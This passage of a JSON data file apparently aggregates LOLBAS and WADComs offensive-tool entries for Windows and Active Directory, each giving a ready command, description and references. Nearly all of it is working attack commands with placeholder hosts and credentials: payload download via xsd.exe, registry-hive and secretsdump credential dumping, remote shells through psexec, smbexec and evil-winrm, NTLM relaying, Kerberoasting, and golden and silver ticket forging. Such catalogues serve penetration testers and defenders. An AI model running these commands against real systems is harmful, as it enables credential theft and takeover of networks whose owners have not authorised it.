processes"}],"references":["https://learn.microsoft.com/en-us/visualstudio/test/vstest-console-options?view=vs-2022","https://lolbas-project.github.io/lolbas/OtherMSBinaries/vstest.console/"]},{"id":"lolbas:winfile-exe:0","toolId":"lolbas:winfile-exe","toolName":"winfile.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"winfile.exe {PATH:.exe}","description":"Execute an executable file with WinFile as a parent process.","usecase":"Performs execution of specified file, can be used as a defense evasion","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\winfile.exe","C:\\Windows\\winfile.exe","C:\\Program Files\\WinFile\\winfile.exe","C:\\Program Files (x86)\\WinFile\\winfile.exe","C:\\Program Files\\WindowsApps\\Microsoft.WindowsFileManager_10.3.0.0_x64__8wekyb3d8bbwe\\WinFile\\winfile.exe"],"toolType":"OtherMSBinary","references":["https://github.com/microsoft/winfile","https://lolbas-project.github.io/lolbas/OtherMSBinaries/winfile/"]},{"id":"lolbas:xsd-exe:0","toolId":"lolbas:xsd-exe","toolName":"xsd.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"xsd.exe {REMOTEURL}","description":"Downloads payload from remote server","usecase":"It will download a remote payload and place it in INetCache","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft SDKs\\Windows\\<version>\\bin\\NETFX <version> Tools\\xsd.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"URL on a xsd.exe command line"},{"type":"IOC","value":"xsd.exe making unexpected network connections or DNS requests"}],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/xsd/"]},{"id":"wadcoms:ADCSEnumaration","toolId":"wadcoms:ADCSEnumaration","toolName":"ADCSEnumaration","name":"ADCSEnumaration","source":"WADComs","platform":["Windows"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"#Note that we are just enumarating here. We are not preforming exploitation. There is a linux equalivent called certipy that works much the same way\n# Find CAs \nC:Tools\\Certify.exe cas \n\n# Find templates\nC:Tools\\Certify.exe find \n\n# Find vulnerable templates\nC:Tools\\Certify.exe find /vulnerable","description":"Active Directory Certifcate Services or ADCS provide an alternative way to authenticate within a AD enviroment that contains a PKI as well as \nbeing configured with a Certifcate Authority. References below will provide technical info on ADCS as well as exploitation techniques from \nspectorops certfied preowned white paper.\n","mitre":[],"requires":["Shell"],"references":["https://github.com/GhostPack/Certify","https://posts.specterops.io/certified-pre-owned-d95910965cd2","https://www.thehacker.recipes/ad/movement/adcs/"]},{"id":"wadcoms:BloodHound.py-Remote-Ingestion-Creds","toolId":"wadcoms:BloodHound.py","toolName":"BloodHound.py","name":"BloodHound.py-Remote-Ingestion-Creds","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"bloodhound.py -u john -p password123 -d test.local -v --zip -c All -dc test.local -ns 10.10.10.1","description":"BloodHound is a single page Javascript web application, built on top of Linkurious, compiled with Electron, with a Neo4j database fed by a data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment.\n\nBloodHound.py is a Python based ingestor for BloodHound, based on Impacket. It allows you to remotely collect data for bloodhound by querying LDAP\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123\n\n\tDomain: test.local\n","mitre":[],"requires":["Username","Password"],"services":["LDAP"],"references":["https://github.com/BloodHoundAD/BloodHound","https://github.com/fox-it/BloodHound.py"]},{"id":"wadcoms:BloodHound.py-Remote-Ingestion","toolId":"wadcoms:BloodHound.py","toolName":"BloodHound.py","name":"BloodHound.py-Remote-Ingestion","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"bloodhound.py -d test.local -v --zip -c All -dc test.local -ns 10.10.10.1","description":"BloodHound is a single page Javascript web application, built on top of Linkurious, compiled with Electron, with a Neo4j database fed by a data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment.\n\nBloodHound.py is a Python based ingestor for BloodHound, based on Impacket. It allows you to remotely collect data for bloodhound by querying LDAP\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n","mitre":[],"requires":["No_Creds"],"services":["LDAP"],"references":["https://github.com/BloodHoundAD/BloodHound","https://github.com/fox-it/BloodHound.py"]},{"id":"wadcoms:CredDumpWithoutMimilkatz","toolId":"wadcoms:CredDumpWithoutMimilkatz","toolName":"CredDumpWithoutMimilkatz","name":"CredDumpWithoutMimilkatz","source":"WADComs","platform":["Windows","Linux"],"capability":[],"nativeCategory":[],"command":"# The following command will dump the SAM, SYSTEM, and SECURITY hives to the current directory.\nreg save HKLM\\SAM sam.hive\nreg save HKLM\\SYSTEM system.hive\nreg save HKLM\\SECURITY security.hive\n\n#Assuming you have transfered the hives to your kali\nsamdump2 system sam \n\n#We can also get lsa secrets via mimikatz\nlsadump::secrets /system:c:\\temp\\system.hive /security:c:\\temp\\security.hive","description":"The lsass Process while great, is no where neaar the only way to dump credintials from windows. One of which is access the three registry hives:\nSAM, SYSTEM, and SECURITY. This is a method that can be used to dump credentials without mimikatz as well as offer some potenial stealth. \n","mitre":[],"requires":["Shell","PrivEsc","Exploitation"],"references":["https://www.ired.team/offensive-security/credential-access-and-credential-dumping","https://www.synacktiv.com/en/publications/lsa-secrets-revisiting-secretsdump"]},{"id":"wadcoms:Dementor","toolId":"wadcoms:Dementor","toolName":"Dementor","name":"Dementor","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 dementor.py -u john -p password123 -d test.local 10.10.10.2 10.10.10.1","description":"dementor.py interacts with the printer spooler on a host to trigger an authentication from the target IP to an attacker controlled host (usually an SMB or HTTP server). This captured authentication can then be relayed to authenticated to other hosts. See more in ntlmrelayx.py.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tAttacker IP: 10.10.10.2\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username"],"services":["RPC","NTLM"],"references":["https://gist.github.com/3xocyte/cfaf8a34f76569a8251bde65fe69dccc","https://www.praetorian.com/blog/active-directory-computer-account-smb-relaying-attack"]},{"id":"wadcoms:Enum4Linux-Creds","toolId":"wadcoms:Enum4Linux","toolName":"Enum4Linux","name":"Enum4Linux-Creds","source":"WADComs","platform":["Linux"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"enum4linux -u john -p password123 -a 10.10.10.1","description":"Enum4Linux is a tool for enumerating information from Windows and Samba systems, using a number of different techniques. The following command will attempt to enumerate information provided valid login credentials.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Username","Password"],"references":["https://github.com/CiscoCXSecurity/enum4linux"]},{"id":"wadcoms:Enum4Linux-NoCreds","toolId":"wadcoms:Enum4Linux","toolName":"Enum4Linux","name":"Enum4Linux-NoCreds","source":"WADComs","platform":["Linux"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"enum4linux -a 10.10.10.1","description":"Enum4Linux is a tool for enumerating information from Windows and Samba systems, using a number of different techniques. The following command will attempt to enumerate information using no credentials.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n","mitre":[],"requires":["No_Creds"],"references":["https://github.com/CiscoCXSecurity/enum4linux"]},{"id":"wadcoms:Evil-WinRM-PTH","toolId":"wadcoms:Evil","toolName":"Evil","name":"Evil-WinRM-PTH","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"evil-winrm -i 10.10.10.1 -u john -H c23b2e293fa0d312de6f59fd6d58eae3","description":"Evil-WinRM uses the Windows Management Instrumentation (WMI) to give you an interactive shell on the Windows host. Evil-WinRM supports passing the victim's NT hash for authorization.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: john\n\n\tNT Hash: c23b2e293fa0d312de6f59fd6d58eae3\n","mitre":[],"requires":["Username","Hash"],"services":["WMI"],"references":["https://github.com/Hackplayers/evil-winrm"]},{"id":"wadcoms:Evil-WinRM","toolId":"wadcoms:Evil","toolName":"Evil","name":"Evil-WinRM","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"evil-winrm -i 10.10.10.1 -u john -p password123","description":"Evil-WinRM uses the Windows Management Instrumentation (WMI) to give you an interactive shell on the Windows host.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username"],"services":["WMI"],"references":["https://github.com/Hackplayers/evil-winrm"]},{"id":"wadcoms:Evil-Winrm-PKINIT","toolId":"wadcoms:Evil","toolName":"Evil","name":"Evil-Winrm-PKINIT","source":"WADComs","platform":["Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"evil-winrm -i 10.10.10.1 -c pub.pem -k priv.pem -S -r EVILCORP","description":"Evil-WinRM uses the Windows Management Instrumentation (WMI) to give you an interactive shell on the Windows host. Winrm Supports PKINIT, meaning if you have a computers PFX file, you can authenticate and get a shell. Note that the command requires a public and a private key in PEM format, that can be extracted by converting the PFX to PEM format. Take a look at the references for more info on that. Password protected PFX files can be cracked with JohnTheRipper.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tPFX File: cert.pfx\n\n\tDomain: EVILCORP\n","mitre":[],"requires":["PFX"],"services":["WMI"],"references":["https://github.com/Hackplayers/evil-winrm","https://book.hacktricks.xyz/cryptography/certificates"]},{"id":"wadcoms:FindUncommonShares","toolId":"wadcoms:FindUncommonShares","toolName":"FindUncommonShares","name":"FindUncommonShares","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"python3 FindUncommonShares.py -u 'john' -d 'TEST.local' -p 'password123' --dc-ip 10.10.10.1","description":"The script FindUncommonShares.py is a Python equivalent of PowerView's Invoke-ShareFinder.ps1 allowing to quickly find uncommon shares in vast Windows Domains.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tAttacker IP: 10.10.10.2\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username","Hash"],"services":["SMB"],"references":["https://github.com/p0dalirius/FindUncommonShares"]},{"id":"wadcoms:Impacket-DCOMExec","toolId":"wadcoms:Impacket","toolName":"Impacket","name":"Impacket-DCOMExec","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 dcomexec.py -object MMC20 test.local/john:password123@10.10.10.1","description":"Impacket's dcomexec.py provides an interactive shell on the Windows host similar to wmiexec.py, but using varying DCOM endpoints.\n\nCurrently supports MMC20.Application, ShellWindows, and ShellBrowserWindow DCOM objects.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tDCOM Object: MMC20\n","mitre":[],"requires":["Password","Username"],"services":["DCOM"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/dcomexec.py","https://riccardoancarani.github.io/2020-05-10-hunting-for-impacket/"]},{"id":"wadcoms:Impacket-Get-GPPPassword","toolId":"wadcoms:Impacket","toolName":"Impacket","name":"Impacket-Get-GPPPassword","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution","Discovery"],"nativeCategory":["Exploitation","Enumeration"],"command":"python3 Get-GPPPassword.py 'TEST.local/john:password123@DC01.TEST.local' -dc-ip 10.10.10.1","description":"Python script to automatically extract and decrypt Group Policy Preferences (GPP) passwords using streams for carving files instead of mounting shares\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username","Hash"],"services":["SMB"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/Get-GPPPassword.py","https://podalirius.net/en/articles/exploiting-windows-group-policy-preferences/"]},{"id":"wadcoms:Impacket-GetADUsers","toolId":"wadcoms:Impacket","toolName":"Impacket","name":"Impacket-GetADUsers","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"python3 GetADUsers.py -all test.local/john:password123 -dc-ip 10.10.10.1","description":"Impacket's GetADUsers.py will attempt to gather data about the domain's users and their corresponding email addresses.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Username","Password"],"services":["Kerberos"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetADUsers.py"]},{"id":"wadcoms:Impacket-GetNPUsers","toolId":"wadcoms:Impacket","toolName":"Impacket","name":"Impacket-GetNPUsers","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 GetNPUsers.py test.local/ -dc-ip 10.10.10.1 -usersfile usernames.txt -format hashcat -outputfile hashes.txt","description":"Impacket's GetNPUsers.py will attempt to harvest the non-preauth AS_REP responses for a given list of usernames. These responses will be encrypted with the user's password, which can then be cracked offline.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername List: usernames.txt\n\n\tOutput File: hashes.txt\n","mitre":[],"requires":["Username"],"services":["Kerberos"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetNPUsers.py","https://www.tarlogic.com/en/blog/how-to-attack-kerberos/"]},{"id":"wadcoms:Impacket-GetUserSPNs","toolId":"wadcoms:Impacket","toolName":"Impacket","name":"Impacket-GetUserSPNs","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 GetUserSPNs.py test.local/john:password123 -dc-ip 10.10.10.1 -request","description":"Impacket's GetUserSPNs.py will attempt to fetch Service Principal Names that are associated with normal user accounts. What is returned is a ticket that is encrypted with the user account's password, which can then be bruteforced offline.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username"],"services":["Kerberos"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetUserSPNs.py","https://www.tarlogic.com/en/blog/how-to-attack-kerberos/"]},{"id":"wadcoms:Impacket-GoldenTicket","toolId":"wadcoms:Impacket","toolName":"Impacket","name":"Impacket-GoldenTicket","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution","Persistence"],"nativeCategory":["Exploitation","Persistence"],"command":"python3 ticketer.py -nthash b18b4b218eccad1c223306ea1916885f -domain-sid S-1-5-21-1339291983-1349129144-367733775 -domain test.local -dc-ip 10.10.10.1 john","description":"Impacket's ticketer.py can perform Golden Ticket attacks, which crafts a valid TGT ticket using a valid user's NTLM hash. It is then possible to access any service using the TGT by requesting a TGS for that service.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tHash: b18b4b218eccad1c223306ea1916885f\n\n\tDomain SID: S-1-5-21-1339291983-1349129144-367733775\n","mitre":[],"requires":["Username","Hash"],"services":["Kerberos"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/ticketer.py","https://www.tarlogic.com/en/blog/how-to-attack-kerberos/"]},{"id":"wadcoms:Impacket-LookUpSID","toolId":"wadcoms:Impacket","toolName":"Impacket","name":"Impacket-LookUpSID","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"python3 lookupsid.py test.local/john:password123@10.10.10.1","description":"Impacket's lookupsid.py performs bruteforcing of Windows SID's to identify users/groups on the remote target.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username"],"services":["RPC"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/lookupsid.py","https://www.puckiestyle.nl/impacket/"]},{"id":"wadcoms:Impacket-NTLMRelayX-Socks","toolId":"wadcoms:Impacket","toolName":"Impacket","name":"Impacket-NTLMRelayX-Socks","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 ntlmrelayx.py -smb2support -t smb://10.10.10.1 -socks","description":"Impacket's ntlmrelayx.py performs NTLM Relay Attacks, creating an SMB and HTTP server and relaying credentials to various different protocols (SMB, HTTP, LDAP, etc.).\n\nThe below command creates an SMB relay server that targets the IP 10.10.10.1, meaning any credentials that the SMB server recieves, gets relayed to that IP to attempt to authenticate and create a socks connection to the host. In order for the SMB server to recieve credentials to relay, dementor.py or Petitpotam can be used to trigger a forced authentication from the IP it's targeting to an attacker controlled SMB server.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n","mitre":[],"requires":["No_Creds"],"services":["NTLM","SMB"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/ntlmrelayx.py","https://www.praetorian.com/blog/active-directory-computer-account-smb-relaying-attack"]},{"id":"wadcoms:Impacket-NTLMRelayX-WPAD","toolId":"wadcoms:Impacket","toolName":"Impacket","name":"Impacket-NTLMRelayX-WPAD","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 ntlmrelayx.py -t ldaps://dc.test.local -wh test-wpad --delegate-access","description":"Impacket's ntlmrelayx.py performs NTLM Relay Attacks, creating an SMB and HTTP server and relaying credentials to various different protocols (SMB, HTTP, LDAP, etc.).\n\nThe below command will perform WPAD spoofing to force the victim machine to authenticate to the attacker controlled host. The command will then relay the authentication to create a new computer object and grant it delegation rights to impersonate users on the victim machine. This command should be used in conjunction with mitm6.\n\nCommand Reference:\n\n\tTarget Domain Controller: dc.test.local\n","mitre":[],"requires":["No_Creds"],"services":["NTLM","LDAP"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/ntlmrelayx.py","https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/"]},{"id":"wadcoms:Impacket-NTLMRelayX","toolId":"wadcoms:Impacket","toolName":"Impacket","name":"Impacket-NTLMRelayX","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 ntlmrelayx.py -smb2support -t smb://10.10.10.1 -c 'whoami /all' -debug","description":"Impacket's ntlmrelayx.py performs NTLM Relay Attacks, creating an SMB and HTTP server and relaying credentials to various different protocols (SMB, HTTP, LDAP, etc.).\n\nThe below command creates an SMB relay server that targets the IP 10.10.10.1, meaning any credentials that the SMB server recieves, gets relayed to that IP to attempt to authenticate and execute 'whoami /all'. In order for the SMB server to recieve credentials to relay, dementor.py can be used to trigger a forced authentication from the IP it's targeting to an attacker controlled SMB server.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n","mitre":[],"requires":["No_Creds"],"services":["NTLM"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/ntlmrelayx.py","https://www.praetorian.com/blog/active-directory-computer-account-smb-relaying-attack"]},{"id":"wadcoms:Impacket-PsExec-PassTheTicket","toolId":"wadcoms:Impacket","toolName":"Impacket","name":"Impacket-PsExec-PassTheTicket","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"export KRB5CCNAME=/full/path/to/john.ccache; python3 psexec.py test.local/john@10.10.10.1 -k -no-pass","description":"Impacket's psexec.py offers psexec like functionality. This will give you an interactive shell on the Windows host. psexec.py also allows using Service Tickets, saved as a ccache file for Authentication. It can be obtained via Impacket's GetST.py\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n","mitre":[],"requires":["TGS","Username"],"services":["SMB"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/psexec.py","https://www.sans.org/blog/psexec-python-rocks/","https://book.hacktricks.xyz/windows/active-directory-methodology/pass-the-ticket#pass-the-ticket-attack"]},{"id":"wadcoms:Impacket-PsExec","toolId":"wadcoms:Impacket","toolName":"Impacket","name":"Impacket-PsExec","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 psexec.py test.local/john:password123@10.10.10.1","description":"Impacket's psexec.py offers psexec like functionality. This will give you an interactive shell on the Windows host.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username"],"services":["SMB"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/psexec.py","https://www.sans.org/blog/psexec-python-rocks/"]},{"id":"wadcoms:Impacket-RBCD","toolId":"wadcoms:Impacket","toolName":"Impacket","name":"Impacket-RBCD","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution","Privilege Escalation","Persistence"],"nativeCategory":["Exploitation","PrivEsc","Persistence"],"command":"python3 rbcd.py -action write -delegate-to \"DC01$\" -delegate-from \"EVILCOMPUTER$\" -dc-ip 10.10.10.1 -hashes :A9FDFA038C4B75EBC76DC855DD74F0DA test.local/john","description":"Impacket rbcd.py will modify the msDS-AllowedToActOnBehalfOfOtherIdentity property of a target computer with security descriptor of another computer.\nThe following command adds the related security descriptor of the created EVILCOMPUTER to the msDS-AllowedToActOnBehalfOfOtherIdentity property of DC01.\nThis basically means that EVILCOMPUTER can get impersonated service tickets for DC01 using getST.py.\n\nCommand Reference:\n\n Target IP: 10.10.10.1\n\n Domain: test.local\n\n Username: john\n\n Hash: :A9FDFA038C4B75EBC76DC855DD74F0DA\n\n Delegate To: DC01$\n\n Delegate From: EVILCOMPUTER$\n","mitre":[],"requires":["Username","Hash"],"services":["Kerberos","SMB","LDAP"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/rbcd.py","https://github.com/tothi/rbcd-attack"]},{"id":"wadcoms:Impacket-RPCDump","toolId":"wadcoms:Impacket","toolName":"Impacket","name":"Impacket-RPCDump","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"python3 rpcdump.py test.local/john:password123@10.10.10.1","description":"Impacket's rpcdump.py enumerates Remote Procedure Call (RPC) endpoints.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username"],"services":["RPC"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/rpcdump.py","https://www.hackingarticles.in/impacket-guide-smb-msrpc/"]},{"id":"wadcoms:Impacket-Reg","toolId":"wadcoms:Impacket","toolName":"Impacket","name":"Impacket-Reg","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution","Persistence"],"nativeCategory":["Exploitation","Persistence"],"command":"python3 reg.py test.local/john:password123@10.10.10.1 query -keyName HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows -s","description":"Impacket's reg.py is a remote registry manipulation tool, providing similar functionality to reg.exe in Windows.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username"],"services":["SMB"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/reg.py","https://www.hackingarticles.in/impacket-guide-smb-msrpc/"]},{"id":"wadcoms:Impacket-SAMRDump","toolId":"wadcoms:Impacket","toolName":"Impacket","name":"Impacket-SAMRDump","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"python3 samrdump.py test.local/john:password123@10.10.10.1","description":"Impacket's samrdump.py communicates with the Security Account Manager Remote (SAMR) interface to list system user accounts, available resource shares, and other sensitive information.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username"],"services":["RPC"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/samrdump.py","https://www.hackingarticles.in/impacket-guide-smb-msrpc/"]},{"id":"wadcoms:Impacket-SMBClient","toolId":"wadcoms:Impacket","toolName":"Impacket","name":"Impacket-SMBClient","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"python3 smbclient.py test.local/john:password123@10.10.10.1","description":"Impacket's smbclient.py is a generic smbclient, allowing you to list shares and files, rename, upload and download files and create and delete directories.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username"],"services":["SMB"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/smbclient.py","https://www.hackingarticles.in/impacket-guide-smb-msrpc/"]},{"id":"wadcoms:Impacket-SMBExec","toolId":"wadcoms:Impacket","toolName":"Impacket","name":"Impacket-SMBExec","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 smbexec.py test.local/john:password123@10.10.10.1","description":"Impacket's smbexec.py. This will give you an interactive shell on the Windows host.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username"],"services":["SMB"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/smbexec.py","https://www.varonis.com/blog/insider-danger-stealthy-password-hacking-with-smbexec/"]},{"id":"wadcoms:Impacket-SecretsDump-NTDS","toolId":"wadcoms:Impacket","toolName":"Impacket","name":"Impacket-SecretsDump-NTDS","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 secretsdump.py -ntds C:\\Windows\\NTDS\\ntds.dit -system C:\\Windows\\System32\\Config\\system -dc-ip 10.10.10.1 test.local/john:password123@10.10.10.2","description":"Impacket's secretsdump.py will perform various techniques to dump secrets from the remote machine without executing any agent. Techniques include reading SAM and LSA secrets from registries, dumping NTLM hashes, plaintext credentials, and kerberos keys, and dumping NTDS.dit. The following command will attempt to use the specified machines NTDS.dit and system file to extract the user account hashes associated with that machine.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.2\n\n\tDomain Controller: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username"],"services":["Kerberos","NTLM"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py","https://riccardoancarani.github.io/2020-05-10-hunting-for-impacket/#secretsdumppy"]},{"id":"wadcoms:Impacket-SecretsDump","toolId":"wadcoms:Impacket","toolName":"Impacket","name":"Impacket-SecretsDump","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 secretsdump.py test.local/john:password123@10.10.10.1","description":"Impacket's secretsdump.py will perform various techniques to dump secrets from the remote machine without executing any agent. Techniques include reading SAM and LSA secrets from registries, dumping NTLM hashes, plaintext credentials, and kerberos keys, and dumping NTDS.dit. The following command will attempt to dump all secrets from the target machine using the previously mentioned techniques.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username"],"services":["Kerberos","NTLM"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py","https://riccardoancarani.github.io/2020-05-10-hunting-for-impacket/#secretsdumppy"]},{"id":"wadcoms:Impacket-Services","toolId":"wadcoms:Impacket","toolName":"Impacket","name":"Impacket-Services","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"python3 services.py test.local/john:password123@10.10.10.1 list","description":"Impacket's services.py communicates with Windows services using the MSRPC interface. It can perform many different actions on any service.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tAction: list\n","mitre":[],"requires":["Password","Username"],"services":["RPC"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/services.py","https://www.hackingarticles.in/impacket-guide-smb-msrpc/"]},{"id":"wadcoms:Impacket-SilverTicket","toolId":"wadcoms:Impacket","toolName":"Impacket","name":"Impacket-SilverTicket","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution","Persistence"],"nativeCategory":["Exploitation","Persistence"],"command":"python3 ticketer.py -nthash b18b4b218eccad1c223306ea1916885f -domain-sid S-1-5-21-1339291983-1349129144-367733775 -domain test.local -dc-ip 10.10.10.1 -spn cifs/test.local john","description":"Impacket's 